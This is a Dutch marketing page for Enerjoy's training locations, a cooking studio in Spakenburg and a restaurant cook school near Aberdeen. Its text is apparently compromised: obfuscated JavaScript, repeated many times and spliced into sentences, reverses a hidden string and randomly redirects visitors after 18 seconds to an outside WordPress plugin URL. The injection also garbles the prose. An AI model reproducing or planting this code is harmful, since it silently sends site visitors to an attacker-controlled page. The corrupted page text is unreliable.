Trainingslocaties

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top: -30px;”>Voor Enerjoy is geen locatie te ver of te moeilijk

Wij bieden onze programma’s aan op alle door u gewenste locaties. Of het nu incompany is of op een andere locatie. Sommigen hiervan zijn wel heel afgelegen en ietwat lastig bereikbaar. Voor de verscheidene workshops vliegt Enerjoy met de helikopter naar olie boor en productie platforms op de Noordzee.

Trainingslocatie voor kooktraining in Nederland

Voor onze kooktrainingen maken wij gebruik van trainingslocatie: Restaurant & Kookstudio ‘De Mandemaaker’ te Spakenburg.
Trainingslocatie voor Enerjoy - Mandemaaker (1)_1Deze kookstudio ligt in het pittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toreske centrum en kijkt uit op de histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torische jachthaven. De rustige bovenetage, met een lichte vergaderruimte, kookstudio met balkon en aparte eetzaal, biedt de perfecte ambiance voor onze kooktrainingen. De professionele keuken is voorzien van alle moderne apparatuur – hier is kokkerellen en bereiden een genoegen. Het restaurant staat bekend voor zijn fijne keuken en allerbeste ingrediënten.
Na de lunch kunnen de deelnemers tijdens een wandeling rond de authentieke scheepshelling een frisse neus halen om weer energiek aan de slag te gaan. De locatie ligt centraal in Nederland, tussen Amsterdam, Amersfoort en Apeldoorn, en op 5km afstand van de A1/afslag Bunschoten/Spakenburg. Er bestaat ruime parkeergelegenheid rondom de locatie.

Trainingslocatie voor kooktraining in Schotland

Cowshed trainingslocatie voor EnerjoyVoor onze kooktrainingen in Schotland maken wij gebruik van trainingslocatie: Cow Shed Restaurant & Cook School. Deze trainingslocatie ligt in het rustige plattelandsdorp Banchory, op zo’n 30 minuten rijden van Aberdeen.
The Cow Shed, met fantastisch uitzicht over de Schotse heuvels, stelt zich op dagen dat het restaurant gesloten is open voor allerlei activiteiten. Wij hebben de beschikking over het gehele restaurant; van de sfeervolle en ruime eetruimte toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de riante en professionele keuken. Het koken in een echte restaurantkeuken geeft de training een extra dimensie en brengt in ieder van ons de meester-kok naar boven. Centraal in de keuken staat een groot kookeiland, voor net even wat extra gezelligheid tijdens het koken.
Ook hier kunnen de deelnemers in de pauzes nieuwe energie opdoen terwijl ze genieten van het prachtige Schotse landschap. De locatie is gemakkelijk te bereiken en heeft een ruime gelegenheid om te parkeren.
Nieuwsgierig? Lees het artikel over onze offshore kooktrainingen in Schotland.